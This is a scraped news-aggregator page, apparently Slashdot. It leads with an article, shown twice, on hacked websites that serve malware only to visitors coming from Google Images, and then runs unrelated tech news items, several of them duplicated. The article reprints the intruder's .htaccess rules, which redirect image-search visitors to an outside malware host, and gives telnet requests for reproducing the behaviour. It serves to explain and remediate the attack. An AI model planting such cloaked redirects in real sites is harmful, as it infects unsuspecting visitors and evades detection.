Slashdot frequent contributor Bennett Haselton writes "Sites that have been hacked by malware writers are now serving infected content only when the visitor views the site through a frame on Google Images. This recent twist on a standard trick used by malware writers, makes it harder for webmasters and hosting companies to discover that their sites have been infected. Automated tools that check websites for infections and training procedures for hosting company abuse-department staffers will have to be updated accordingly." Read on for the rest of Bennett's thoughts.A friend of mine recently e-mailed a discussion list with an interesting query. Stonewall Ballard had searched on "tradingbloxlogo" on Google Images, which led to the results on this page. Clicking on the first result, an image from the tradingblox.com site, took him to this page, with the Google information header at the top, and loading the http://www.tradingblox.com/tradingblox/courses.htm page in a frame in the bottom half of the browser window. When that page was loaded in that bottom frame, Internet Explorer and Firefox would both flash warnings about the page being infected with malware. But if you loaded the http://www.tradingblox.com/tradingblox/courses.htm page in a normal Web browser window by itself, the browser would not display any warning, and checking the site using Google's malware query form returned a result saying the site was not suspicious. Why the differing results?
It turned out that the tradingblox.com had been hacked, and pages had been installed onto the server that would serve malware in an unusual way: If the page was being viewed in a frame loaded from Google Images, or as as result of a click through from Google Images, then the page would serve content that attempted to infect the user's computer with malware. On the other hand, if the page was viewed normally (as a result of typing the page into your browser), the malware-loading code would not be served. That means if you were to telnet to port 80 on the www.tradingblox.com server, and request a page as follows:
GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.comthen the normal page would be returned. But if you entered these commands:
GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com
Referer: http://images.google.com/then you would get the malware-infected page. (The webmaster has since fixed the problem, so that the latter request will no longer get the malware code.) The webserver would only serve the infected content if "images.google.com" was sent specifically as the referrer; "www.google.com" by itself would not trigger the result.
(For the uninitiated, when you click a link from one page to another, for example if you were reading an article on CNN.com which had a link to http://www.google.com/support/ and you clicked on that link, then when your browser requested the file "/support/" from the www.google.com server, it would send the request as follows:
GET /support/ HTTP/1.1
Host: www.google.com
Referer: http://www.cnn.com/article.url.goes.here/So the webmasters of www.google.com can see what links people are clicking from other websites to reach the www.google.com site. Many sites use this to track which links from other pages, including advertisements that they've bought on other sites, are sending them the most traffic.)
Denis Sinegubko, owner of the website malware-infection checking site UnmaskParasites.com, says that he had seen pages before which would serve infected content if www.google.com itself were listed in the Referer: field. However, this was the first instance he'd seen where the content was only served if images.google.com was specifically listed as the Referer. Since no malware distributor would manually break into just one website to compromise it in this exact manner, it's extremely likely that there are many more sites that are infected in the same way. Stonewall Ballard noted that the Google Safe Browsing lookup for the hosting company where tradingblox.com is hosted, showed a high number of other sites on the same network that had been infected recently. (And those are only the infected sites that Google knows about -- recall that Google didn't even know that tradingblox.com was infected.)
Obviously, from the malware author's point of view, the point of serving malware content only some of the time rather than all of the time, is to make it harder for webmasters to pinpoint the problem. Someone gets the malware warning after following a link or loading a page via Google Images, and sends the webmaster an e-mail saying, "I got infected by your webpage, here is the link." The webmaster views the link and says, "I don't know what you're talking about, there's no malware code on that page." It also makes it harder for automated site-checking tools to detect the infection. Google's Safe Browsing lookup tool reported the site as uninfected, and Sinegubko's site-checking tool on UnmaskParasites.com also reported no malware infections on tradingblox.com, even while the site was still infected. (Sinegubko said he would possibly modify his site-checking script so that in addition to the other checks it performs, it will attempt to request a page sending "http://images.google.com/" in the "Referer:" field, to see if that results in different content being served. Google's Safe Browsing spider should do the same.)
Sinegubko said he's also seen instances where hacked sites would cover their tracks even further, by refusing to display infected content if the Referer: link from Google contained "inurl:domainname.com" or "site:domainname.com". This is because webmasters would sometimes check if their site was serving infected content in response to a click from Google, by doing a Google search on their own domainname.com, and following the link back to their site. By not serving the infected content in that case, the malware infection becomes even harder to detect.
This also makes it harder to report the exploits to the hosting companies that host infected websites. In case the webmaster of the infected site doesn't respond to complaints that their site is infected, sometimes you have to contact the hosting company and ask them to forcibly take the website offline until the problem is fixed. And I have been hosted by several companies where the tech support and abuse departments were (just barely) competent enough that if I called them up and said, "Your customer is hosting a malware-infected webpage, go to this page and view the source code, and you can see the malicious code", they would have known what to do. But if I'd had to tell them to follow the steps above -- "telnet to port 80" on the infected website, and type a few lines to mimic the process of a browser sending HTTP request headers to the website -- I probably would have lost them at "telnet". (Recall an experiment wherein I e-mailed some hosting companies from a Hotmail account, asking them to change the nameservers for a domain that I had hosted with them, and about half of the hosting companies agreed to switch the domain nameservers -- essentially, transferring the entire website to an unknown third party -- without ever authenticating that it was really me writing from that Hotmail account. Which means anybody could have taken over those websites simply by sending an e-mail. Front-end tech support at cheap hosting companies is often not very smart.)
Fortunately, Tim Arnold, the webmaster of the tradingblox.com site, did respond to the original report about the malware-infected pages, and found that an intruder had hacked the site on November 30th and inserted these lines into an .htaccess file:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://search-box.in/in.cgi?4¶meter=u [R,L]
<Files 403.shtml>
order allow,deny
allow from all
</Files>which resulted in the infected pages being served whenever a user loaded the site via Google Images. (So if you found this article because you think your own site might be infected by malware that serves pages conditionally on the Referer: field, that's the first place to look to fix the problem!)
It's uncertain how Arnold's site got infected in the first place, but Sinegubko had earlier said that almost 90% of breakins in 2009 that occurred on Linux-hosted sites, were caused by malware installed surreptitiously on people's Windows PCs and stealing the passwords that people used to administer their sites. Or the site could have been compromised via a WordPress exploit such as this one. As I always tell anyone who will listen, if you want to keep your Linux-hosted website from being broken into, one of the most frequently overlooked precautions that you need to take is to keep your Windows PC free of spyware.
But the larger point is that as malware becomes more aggressive, it's not just going to become harder to keep your PC and websites uninfected. It's also going to become harder for site owners and for hosting company abuse departments to verify that a site has been hacked, as the hacks use more sophisticated techniques to prevent the infection from being discovered. Abuse report handlers will have to be trained to understand what it means that a website is only showing infected content as a result of a "Referer:" header, and ideally should know enough about networking and command-line tools, to be able to mimic the "telnet" instructions above. (Most expensive dedicated hosting companies like RackSpace, do have technical staff who are at least that knowledgeable. But cheap shared hosting companies -- the kind where you can get your domain transferred to another company by sending an e-mail from an unauthenticated Hotmail account -- will have to train their abuse staff better.) Automated site-checking tools like Google's Safe Browsing spider and UnmaskParasites.com's site checker will have to start taking these attacks into account when checking a site for infection.
And as always, keeping your PC free of spyware, shouldn't be viewed just as a convenience to yourself, but as an obligation to your neighbors as well. (A case of the positive/negative externalities problem in economics.) You wouldn't send your kid to school with the flu, so why did you get your Mom on the Internet without buying her some anti-virus software?
-
Image Searchers Snared By Malware
Slashdot frequent contributor Bennett Haselton writes "Sites that have been hacked by malware writers are now serving infected content only when the visitor views the site through a frame on Google Images. This recent twist on a standard trick used by malware writers, makes it harder for webmasters and hosting companies to discover that their sites have been infected. Automated tools that check websites for infections and training procedures for hosting company abuse-department staffers will have to be updated accordingly." Read on for the rest of Bennett's thoughts.A friend of mine recently e-mailed a discussion list with an interesting query. Stonewall Ballard had searched on "tradingbloxlogo" on Google Images, which led to the results on this page. Clicking on the first result, an image from the tradingblox.com site, took him to this page, with the Google information header at the top, and loading the http://www.tradingblox.com/tradingblox/courses.htm page in a frame in the bottom half of the browser window. When that page was loaded in that bottom frame, Internet Explorer and Firefox would both flash warnings about the page being infected with malware. But if you loaded the http://www.tradingblox.com/tradingblox/courses.htm page in a normal Web browser window by itself, the browser would not display any warning, and checking the site using Google's malware query form returned a result saying the site was not suspicious. Why the differing results?
It turned out that the tradingblox.com had been hacked, and pages had been installed onto the server that would serve malware in an unusual way: If the page was being viewed in a frame loaded from Google Images, or as as result of a click through from Google Images, then the page would serve content that attempted to infect the user's computer with malware. On the other hand, if the page was viewed normally (as a result of typing the page into your browser), the malware-loading code would not be served. That means if you were to telnet to port 80 on the www.tradingblox.com server, and request a page as follows:
GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.comthen the normal page would be returned. But if you entered these commands:
GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com
Referer: http://images.google.com/then you would get the malware-infected page. (The webmaster has since fixed the problem, so that the latter request will no longer get the malware code.) The webserver would only serve the infected content if "images.google.com" was sent specifically as the referrer; "www.google.com" by itself would not trigger the result.
(For the uninitiated, when you click a link from one page to another, for example if you were reading an article on CNN.com which had a link to http://www.google.com/support/ and you clicked on that link, then when your browser requested the file "/support/" from the www.google.com server, it would send the request as follows:
GET /support/ HTTP/1.1
Host: www.google.com
Referer: http://www.cnn.com/article.url.goes.here/So the webmasters of www.google.com can see what links people are clicking from other websites to reach the www.google.com site. Many sites use this to track which links from other pages, including advertisements that they've bought on other sites, are sending them the most traffic.)
Denis Sinegubko, owner of the website malware-infection checking site UnmaskParasites.com, says that he had seen pages before which would serve infected content if www.google.com itself were listed in the Referer: field. However, this was the first instance he'd seen where the content was only served if images.google.com was specifically listed as the Referer. Since no malware distributor would manually break into just one website to compromise it in this exact manner, it's extremely likely that there are many more sites that are infected in the same way. Stonewall Ballard noted that the Google Safe Browsing lookup for the hosting company where tradingblox.com is hosted, showed a high number of other sites on the same network that had been infected recently. (And those are only the infected sites that Google knows about -- recall that Google didn't even know that tradingblox.com was infected.)
Obviously, from the malware author's point of view, the point of serving malware content only some of the time rather than all of the time, is to make it harder for webmasters to pinpoint the problem. Someone gets the malware warning after following a link or loading a page via Google Images, and sends the webmaster an e-mail saying, "I got infected by your webpage, here is the link." The webmaster views the link and says, "I don't know what you're talking about, there's no malware code on that page." It also makes it harder for automated site-checking tools to detect the infection. Google's Safe Browsing lookup tool reported the site as uninfected, and Sinegubko's site-checking tool on UnmaskParasites.com also reported no malware infections on tradingblox.com, even while the site was still infected. (Sinegubko said he would possibly modify his site-checking script so that in addition to the other checks it performs, it will attempt to request a page sending "http://images.google.com/" in the "Referer:" field, to see if that results in different content being served. Google's Safe Browsing spider should do the same.)
Sinegubko said he's also seen instances where hacked sites would cover their tracks even further, by refusing to display infected content if the Referer: link from Google contained "inurl:domainname.com" or "site:domainname.com". This is because webmasters would sometimes check if their site was serving infected content in response to a click from Google, by doing a Google search on their own domainname.com, and following the link back to their site. By not serving the infected content in that case, the malware infection becomes even harder to detect.
This also makes it harder to report the exploits to the hosting companies that host infected websites. In case the webmaster of the infected site doesn't respond to complaints that their site is infected, sometimes you have to contact the hosting company and ask them to forcibly take the website offline until the problem is fixed. And I have been hosted by several companies where the tech support and abuse departments were (just barely) competent enough that if I called them up and said, "Your customer is hosting a malware-infected webpage, go to this page and view the source code, and you can see the malicious code", they would have known what to do. But if I'd had to tell them to follow the steps above -- "telnet to port 80" on the infected website, and type a few lines to mimic the process of a browser sending HTTP request headers to the website -- I probably would have lost them at "telnet". (Recall an experiment wherein I e-mailed some hosting companies from a Hotmail account, asking them to change the nameservers for a domain that I had hosted with them, and about half of the hosting companies agreed to switch the domain nameservers -- essentially, transferring the entire website to an unknown third party -- without ever authenticating that it was really me writing from that Hotmail account. Which means anybody could have taken over those websites simply by sending an e-mail. Front-end tech support at cheap hosting companies is often not very smart.)
Fortunately, Tim Arnold, the webmaster of the tradingblox.com site, did respond to the original report about the malware-infected pages, and found that an intruder had hacked the site on November 30th and inserted these lines into an .htaccess file:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://search-box.in/in.cgi?4¶meter=u [R,L]
<Files 403.shtml>
order allow,deny
allow from all
</Files>which resulted in the infected pages being served whenever a user loaded the site via Google Images. (So if you found this article because you think your own site might be infected by malware that serves pages conditionally on the Referer: field, that's the first place to look to fix the problem!)
It's uncertain how Arnold's site got infected in the first place, but Sinegubko had earlier said that almost 90% of breakins in 2009 that occurred on Linux-hosted sites, were caused by malware installed surreptitiously on people's Windows PCs and stealing the passwords that people used to administer their sites. Or the site could have been compromised via a WordPress exploit such as this one. As I always tell anyone who will listen, if you want to keep your Linux-hosted website from being broken into, one of the most frequently overlooked precautions that you need to take is to keep your Windows PC free of spyware.
But the larger point is that as malware becomes more aggressive, it's not just going to become harder to keep your PC and websites uninfected. It's also going to become harder for site owners and for hosting company abuse departments to verify that a site has been hacked, as the hacks use more sophisticated techniques to prevent the infection from being discovered. Abuse report handlers will have to be trained to understand what it means that a website is only showing infected content as a result of a "Referer:" header, and ideally should know enough about networking and command-line tools, to be able to mimic the "telnet" instructions above. (Most expensive dedicated hosting companies like RackSpace, do have technical staff who are at least that knowledgeable. But cheap shared hosting companies -- the kind where you can get your domain transferred to another company by sending an e-mail from an unauthenticated Hotmail account -- will have to train their abuse staff better.) Automated site-checking tools like Google's Safe Browsing spider and UnmaskParasites.com's site checker will have to start taking these attacks into account when checking a site for infection.
And as always, keeping your PC free of spyware, shouldn't be viewed just as a convenience to yourself, but as an obligation to your neighbors as well. (A case of the positive/negative externalities problem in economics.) You wouldn't send your kid to school with the flu, so why did you get your Mom on the Internet without buying her some anti-virus software?
-
Brokers Get Strict Social Networking Rules
eldavojohn writes "If you're a broker or work for a brokerage firm then you better think twice before posting content to Facebook and Twitter. It seems the static parts of the pages like your profile must be approved and fall under the watch of FINRA. But a post to Facebook or a tweet might constitute a 'public appearance' representing your firm. Which means that 'firms must supervise these interactive electronic communications under NASD Rule 3010 in a manner reasonably designed to ensure that they do not violate the content requirements of FINRA's communications rules.' It's days like these I'm glad I don't work on Wall Street or have jury duty." -
Europe's LHC To Run At Half-Energy Through 2011
quaith writes "ScienceInsider reports that Europe's Large Hadron Collider will run at half its maximum energy through 2011 and likely not at all in 2012. The previous plan was to ramp it up to 70% of maximum energy this year. Under the new plan, the LHC will run at 7 trillion electron-volts through 2011. The LHC would then shut down for a year so workers could replace all of its 10,000 interconnects with redesigned ones allowing the LHC to run at its full 14 TeV capacity in 2013. The change raises hopes at the LHC's lower-energy rival, the Tevatron Collider at Fermi National Accelerator Laboratory in Batavia, Illinois, of being extended through 2012 instead of being shut down next year. Fermilab researchers are hoping that their machine might collect enough data to beat the LHC to the discovery of the Higgs boson, a particle key to how physicists explain the origin of mass." -
Giving CubeSats Electric Propulsion
eldavojohn writes "Thirteen picosatellites were launched back in June of 2006 with the price coming down dramatically in the years since. But the Rubik's cube sized devices have no mobility, meaning once they're put in orbit, they stay in that orbit. The big problem is that traditional chemical propulsion systems are too large for ten-centimeter sided cubes weighing a kilogram. A new electric propulsion system designed by Paulo Lozano of MIT might change that. " "The article explains how it works: 'Lozano's design relies on electrospraying, a physics process that uses electricity to extract positive and negative ions from a liquid salt that is created in a laboratory and serves as the system's propellant. The liquid contains no solvent, such as water, and can be charged electrically with no heat involved. Whereas other electric propulsion systems charge the ions in a chamber on the satellite, the ionic liquid in Lozano's design has already been charged on the ground, which is why his system doesn't need a chamber. Electricity is then converted from the main power source of the CubeSat, typically batteries or a solar panel, and applied to a tiny structure roughly the size of a postage stamp. This thin panel is made of about 1,000 porous metal structures that resemble needles and have several grams of the ionic liquid on them. By applying voltage to the needles, an electric field is created that extracts the ions from the liquid, accelerates them at very high speeds and forces them to fly away. This process creates an ionic force strong enough to produce thrust.'" -
Giving CubeSats Electric Propulsion
eldavojohn writes "Thirteen picosatellites were launched back in June of 2006 with the price coming down dramatically in the years since. But the Rubik's cube sized devices have no mobility, meaning once they're put in orbit, they stay in that orbit. The big problem is that traditional chemical propulsion systems are too large for ten-centimeter sided cubes weighing a kilogram. A new electric propulsion system designed by Paulo Lozano of MIT might change that. " "The article explains how it works: 'Lozano's design relies on electrospraying, a physics process that uses electricity to extract positive and negative ions from a liquid salt that is created in a laboratory and serves as the system's propellant. The liquid contains no solvent, such as water, and can be charged electrically with no heat involved. Whereas other electric propulsion systems charge the ions in a chamber on the satellite, the ionic liquid in Lozano's design has already been charged on the ground, which is why his system doesn't need a chamber. Electricity is then converted from the main power source of the CubeSat, typically batteries or a solar panel, and applied to a tiny structure roughly the size of a postage stamp. This thin panel is made of about 1,000 porous metal structures that resemble needles and have several grams of the ionic liquid on them. By applying voltage to the needles, an electric field is created that extracts the ions from the liquid, accelerates them at very high speeds and forces them to fly away. This process creates an ionic force strong enough to produce thrust.'" -
Sun's Project Darkstar Game Server Platform No More
sproketboy writes "Project Darkstar, an open source software platform from Sun labs that simplifies the development of horizontally scalable servers for online games, is being discontinued as of the Oracle acquisition. This project, mentioned a couple of years back on Slashdot, was a unique concept for building an application server specific to on-line gaming. Sadly they were so close at version 0.9.11 (which is still very stable). Hopefully the open source community can get involved and help continue work on this project." -
Univ. Help Desk Staffer Extorts Over Copyright Violations
McGruber writes "The Atlanta fishwrap is reporting that an University of Georgia 'IT security support' employee was accusing students of copyright violations, then demanding money to clear their names. Sounds like he's been caught stealing the RIAA business model." -
Facebook's HipHop Also a PHP Webserver
darthcamaro writes "As expected, Facebook today announced a new runtime for PHP, called HipHop. What wasn't expected were a few key revelations disclosed today by Facebook developer David Recordan. As it turns out, Facebook has been running HipHop for months and it now powers 90 percent of their servers — it's not a skunkworks project; it's a Live production technology. It's also not just a runtime, it's also a new webserver. 'In general, Apache is a great Web server, but when we were looking at how we get the next half percent or percent of performance, we didn't need all the features that Apache offers," Recordon said. He added, however, that he hopes an open source project will one day emerge around making HipHop work with Apache Web servers.'" -
How Many SUSE Subscriptions Can You Get For $240M?
itwbennett writes "According to an SD Times article, Microsoft is almost through passing out the infamous subscription certificates for SUSE Enterprise Linux that it purchased for $240 million as part of its investment in Novell. According to the article, Microsoft says that 'a total of 475 customers have used an unspecified number of coupons.' Blogger Brian Proffitt calculates that 'if indeed just 475 customers have received these coupons, then Microsoft has essentially subsidized SUSE Linux Enterprise Server (SLES) deployments to an average tune of US$505,263.16 per customer.'" -
Woz Cites "Scary" Prius Acceleration Software Problem
theodp writes "Speaking at Discovery Forum 2010, Apple co-founder Steve Wozniak went off topic and spoke about a 'very scary' problem with his 2010 Toyota Prius. 'I don't get upset and teed off at things in life, except computers that don't work right,' said Woz, who went on to explain he'd been trying to get through to Toyota and the National Highway Transportation Safety Administration for three months, but could not get anyone to explore an alleged software-related acceleration problem. 'I have a new model that didn't get recalled,' Steve said. 'This new model has an accelerator that goes wild but only under certain conditions of cruise control. And I can repeat it over and over and over again — safely.' Toyota said it investigates all complaints. 'We're in the business of investigating complaints, assessing problems and finding remedies,' said Toyota's John Hanson. 'After man-years of exhaustive testing we have not found any evidence of an electronic [software] problem that would have led to unwanted acceleration.'" We recently discussed other problems Toyota has had with electronic acceleration systems. -
Amazon Surrenders To Macmillan On eBook Pricing
CuteSteveJobs writes with a followup to news we discussed on Saturday of a disagreement between Amazon and Macmillan Publishers over ebook pricing: "Amazon has thrown in the towel and announced it will now sell books at Macmillan's increased prices; up to $14.99 from $9.99. Said Amazon in a statement: 'We will have to capitulate and accept Macmillan's terms because Macmillan has a monopoly over their own titles, and we will want to offer them to you even at prices we believe are needlessly high for e-books.' Macmillan has sensed Apple's iBooks opens the way for higher prices. Perhaps the question should be: do we even need publishers like Macmillian? Publishers have long managed to keep their old business model chugging along nicely despite the Internet; Academics are still forced to give up copyright (PDF) of their work in exchange for publication. Textbook publishers have a history of unethical practices like frequent edition changes, unjustifiable price increases and bribing teachers. For that matter, why do the RIAA's members still control the music business? Why do these dinosaur publishing businesses still manage to thrive despite the Internet?" -
De-Anonymizing Social Network Users
An anonymous reader writes "The H has an article about some researchers who found a new way to de-anonymize people. Compared to the EFF's Panopticlick, the goal of this experiment is not to identify a user's browser uniquely, but to identify individual users. The test essentially exploits the fact that many social network users are identifiable by their membership of various groups. According to the researchers, it's very unlikelly that two people on any social network will belong to exactly the same groups. A 'group fingerprint' can thus allow websites to identify previously anonymous visitors. They describe the setup and all details and the results look very interesting. They also have a live demo for the social network Xing that was able to de-anonymize me." -
Military's Robotic Pack Mule Gets $32M Boost
coondoggie sends word that Boston Dynamics, maker of the BigDog robot we have been following for a while, has just been awarded a $32M DARPA contract to produce robotic "pack dogs" for the military. "What kind of robot will automatically follow a leader, carry 400 lbs. (182 kg) of military gear, walk 20 miles in all manner of weather, and go 24 hours without refueling? Well, we might soon find out as DARPA has awarded a $32 million contract to build its Legged Squad Support System (LS3) which uses sensors and a GPS to walk along with soldiers across all manner of terrain in any weather without pulling any muscles." -
Military's Robotic Pack Mule Gets $32M Boost
coondoggie sends word that Boston Dynamics, maker of the BigDog robot we have been following for a while, has just been awarded a $32M DARPA contract to produce robotic "pack dogs" for the military. "What kind of robot will automatically follow a leader, carry 400 lbs. (182 kg) of military gear, walk 20 miles in all manner of weather, and go 24 hours without refueling? Well, we might soon find out as DARPA has awarded a $32 million contract to build its Legged Squad Support System (LS3) which uses sensors and a GPS to walk along with soldiers across all manner of terrain in any weather without pulling any muscles." -
Sams Teach Yourself HTML and CSS In 24 Hours
r3lody writes "Sams Teach Yourself HTML and CSS in 24 Hours 8th edition, by Julie C. Meloni and Michael Morrison, provides the beginning and intermediate web designer with the tools needed to create standards-based web sites. The major focus of the book is XHTML 1.1 and CSS 2, but HTML 5 and some XHTML 1.0 are discussed. Overall, the presentation and content are very good. One small minus was that the publisher's site did not include downloadable examples from the book. I also found no errata until the latter parts of the book. Published in December of 2009, the 8th edition provides reasonably current information." Read on for Ray's review. Sams Teach Yourself HTML and CSS in 24 Hours (8th edition) author Julie C. Meloni and Michael Morrison pages 456 publisher Sams rating 8/10 reviewer Ray Lodato ISBN 0672330970 summary A very useful text on web page coding using XHTML and CSS. Each "hour" of the book includes a "What You'll Learn in this Hour" section at the beginning, and Q&A, Quiz and Exercises sections at the end. Most chapters also include a "Try It Yourself" section, indicating what you should be accomplishing with your own web site. The examples have color coding for the various tags, comments, etc., and the book's examples work with a number of browsers. Specifically, Apple Safari, Google Chrome, Microsoft Internet Explorer, Mozilla Firefox, and Opera browsers were used to test the examples. If you use the coding standards espoused in the book, your web pages should appear properly formatted across most computers. Handheld browsers are only covered briefly, in the section discussing media-specific style sheets.
Overall, the book is divided into five parts: Getting Started on the Web, Building Blocks of Practical Web Design, Advanced Web Page Design with CSS, Advanced Web Site Functionality and Management, and Appendixes.
Part I: Getting Started on the Web provides the customary introductory material, suitable for beginning users. After describing the seemingly obligatory "history of the web", the first hour concludes with discussions of how to choose a web hosting provider – a topic rarely covered in the books I've read. The second hour teaches how to get web pages uploaded to a web server using FTP, and how to distribute content in a file-based structure without a server. The next two hours then cover the basics of XHTML 1.1 and CSS 2. For both XHTML and CSS, very clear instructions on how to validate your coding help insure that your pages follow the standards.
The next 9 chapters comprise Part II: (Building Blocks of Practical Web Design). This part goes into detail regarding web page coding. Starting with text alignment using paragraph tags and lists, the book has a good collection of text formatting tips using CSS as the preferred style methodology. Tables and links are covered in the next two chapters at a pretty standard level. I found the chapter on using color had a lot of good information, but I believe a beginning user would find it somewhat confusing – especially when hexadecimal notation is introduced.
The next three chapters of this part of the book cover images and multimedia. I liked the focus on getting the right sizing for photos and banners, and the tutorial on how to place the images on the web page (including wrapping text, image maps, and clickable images). I was disappointed in the limited coverage of tiling and GIF animation. The multimedia chapter was a pleasant addition – one I have rarely seen in web design texts. The discussion was tilted toward Microsoft technology, so my testing worked properly only under Internet Explorer at first, however I finally managed to get Firefox to deal with the embedded object. Some information was given for embedding YouTube links, also. I would have liked to have seen more information on the parameters for the WMP object coding. The last chapter in Part II covers frames – both framesets and iframes – with only basic information.
Advanced Web Page Design with CSS is the main topic of Part III. These six chapters dig into the important aspects of CSS alignment. One chapter focuses entirely on margins, padding, alignment and floating, and provides a nice introduction to the full discussion of the CSS box model in the next chapter. Reformatting lists was the principal target of the next chapter, leading to a discussion of navigation bars (horizontal and vertical) in the chapter after that. This is where I started picking up on some irregularities that escaped a review. For example, even though this was supposed to be standard XHTML, I noticed some list item ending tags missing from the examples. Granted, browsers still display the list properly, but this should have been caught before printing.
The last two chapters in this part cover modifying text display using mouse actions, and fixed versus liquid layouts. I liked the mouse techniques to modify a displayed image based on which thumbnail image the mouse is over. It's a simple little method that looks very nice on the page. The liquid layout chapter gave me some problems at first. My attempts didn't work the same under different browsers at first, but when I went back over them while writing the review, they worked just fine. I'm still at a loss to understand what was wrong, so I suspect those starting out may have a similar experience.
The final major part, Advanced Web Site Functionality and Management, wraps up some miscellaneous issues. First, they cover how to create a modified CSS profile to make the web page more print-friendly. The next chapter provides an introduction to JavaScript. Unfortunately, this is where I found some more non-standard XHTML code. Web-based forms are covered only at a high-level in hour 22. The authors do provide examples of each type of form field, with CSS code to neaten up the page, but it appears to be a very cursory handling of the topic.
The final two hours go over the basics of keeping your web site organized, and how to publicize the site on major search engines. The book wraps up with a final part for the two appendixes, containing useful links to further information and a general XHTML and CSS reference.
Teach Yourself HTML and CSS in 24 Hours appears to be a properly authoritative text that would help you create a standards-based web site. Like most texts of this type, it does not reference web design software such as DreamWeaver. Rather, it addresses understanding exactly what code standards-based browsers will handle, and how you can manipulate them to create exactly what you want. The two main disappointments with the book are the obvious errors in the later chapters, and the lack of downloadable examples from the publisher's web site. That said, the content is so worthwhile, I rated it an 8 out of 10.
You can purchase Sams Teach Yourself HTML and CSS in 24 Hours (8th edition) from amazon.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page. -
Sams Teach Yourself HTML and CSS In 24 Hours
r3lody writes "Sams Teach Yourself HTML and CSS in 24 Hours 8th edition, by Julie C. Meloni and Michael Morrison, provides the beginning and intermediate web designer with the tools needed to create standards-based web sites. The major focus of the book is XHTML 1.1 and CSS 2, but HTML 5 and some XHTML 1.0 are discussed. Overall, the presentation and content are very good. One small minus was that the publisher's site did not include downloadable examples from the book. I also found no errata until the latter parts of the book. Published in December of 2009, the 8th edition provides reasonably current information." Read on for Ray's review. Sams Teach Yourself HTML and CSS in 24 Hours (8th edition) author Julie C. Meloni and Michael Morrison pages 456 publisher Sams rating 8/10 reviewer Ray Lodato ISBN 0672330970 summary A very useful text on web page coding using XHTML and CSS. Each "hour" of the book includes a "What You'll Learn in this Hour" section at the beginning, and Q&A, Quiz and Exercises sections at the end. Most chapters also include a "Try It Yourself" section, indicating what you should be accomplishing with your own web site. The examples have color coding for the various tags, comments, etc., and the book's examples work with a number of browsers. Specifically, Apple Safari, Google Chrome, Microsoft Internet Explorer, Mozilla Firefox, and Opera browsers were used to test the examples. If you use the coding standards espoused in the book, your web pages should appear properly formatted across most computers. Handheld browsers are only covered briefly, in the section discussing media-specific style sheets.
Overall, the book is divided into five parts: Getting Started on the Web, Building Blocks of Practical Web Design, Advanced Web Page Design with CSS, Advanced Web Site Functionality and Management, and Appendixes.
Part I: Getting Started on the Web provides the customary introductory material, suitable for beginning users. After describing the seemingly obligatory "history of the web", the first hour concludes with discussions of how to choose a web hosting provider – a topic rarely covered in the books I've read. The second hour teaches how to get web pages uploaded to a web server using FTP, and how to distribute content in a file-based structure without a server. The next two hours then cover the basics of XHTML 1.1 and CSS 2. For both XHTML and CSS, very clear instructions on how to validate your coding help insure that your pages follow the standards.
The next 9 chapters comprise Part II: (Building Blocks of Practical Web Design). This part goes into detail regarding web page coding. Starting with text alignment using paragraph tags and lists, the book has a good collection of text formatting tips using CSS as the preferred style methodology. Tables and links are covered in the next two chapters at a pretty standard level. I found the chapter on using color had a lot of good information, but I believe a beginning user would find it somewhat confusing – especially when hexadecimal notation is introduced.
The next three chapters of this part of the book cover images and multimedia. I liked the focus on getting the right sizing for photos and banners, and the tutorial on how to place the images on the web page (including wrapping text, image maps, and clickable images). I was disappointed in the limited coverage of tiling and GIF animation. The multimedia chapter was a pleasant addition – one I have rarely seen in web design texts. The discussion was tilted toward Microsoft technology, so my testing worked properly only under Internet Explorer at first, however I finally managed to get Firefox to deal with the embedded object. Some information was given for embedding YouTube links, also. I would have liked to have seen more information on the parameters for the WMP object coding. The last chapter in Part II covers frames – both framesets and iframes – with only basic information.
Advanced Web Page Design with CSS is the main topic of Part III. These six chapters dig into the important aspects of CSS alignment. One chapter focuses entirely on margins, padding, alignment and floating, and provides a nice introduction to the full discussion of the CSS box model in the next chapter. Reformatting lists was the principal target of the next chapter, leading to a discussion of navigation bars (horizontal and vertical) in the chapter after that. This is where I started picking up on some irregularities that escaped a review. For example, even though this was supposed to be standard XHTML, I noticed some list item ending tags missing from the examples. Granted, browsers still display the list properly, but this should have been caught before printing.
The last two chapters in this part cover modifying text display using mouse actions, and fixed versus liquid layouts. I liked the mouse techniques to modify a displayed image based on which thumbnail image the mouse is over. It's a simple little method that looks very nice on the page. The liquid layout chapter gave me some problems at first. My attempts didn't work the same under different browsers at first, but when I went back over them while writing the review, they worked just fine. I'm still at a loss to understand what was wrong, so I suspect those starting out may have a similar experience.
The final major part, Advanced Web Site Functionality and Management, wraps up some miscellaneous issues. First, they cover how to create a modified CSS profile to make the web page more print-friendly. The next chapter provides an introduction to JavaScript. Unfortunately, this is where I found some more non-standard XHTML code. Web-based forms are covered only at a high-level in hour 22. The authors do provide examples of each type of form field, with CSS code to neaten up the page, but it appears to be a very cursory handling of the topic.
The final two hours go over the basics of keeping your web site organized, and how to publicize the site on major search engines. The book wraps up with a final part for the two appendixes, containing useful links to further information and a general XHTML and CSS reference.
Teach Yourself HTML and CSS in 24 Hours appears to be a properly authoritative text that would help you create a standards-based web site. Like most texts of this type, it does not reference web design software such as DreamWeaver. Rather, it addresses understanding exactly what code standards-based browsers will handle, and how you can manipulate them to create exactly what you want. The two main disappointments with the book are the obvious errors in the later chapters, and the lack of downloadable examples from the publisher's web site. That said, the content is so worthwhile, I rated it an 8 out of 10.
You can purchase Sams Teach Yourself HTML and CSS in 24 Hours (8th edition) from amazon.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page. -
Breakthrough Grows Graphene On Silicon Substrate
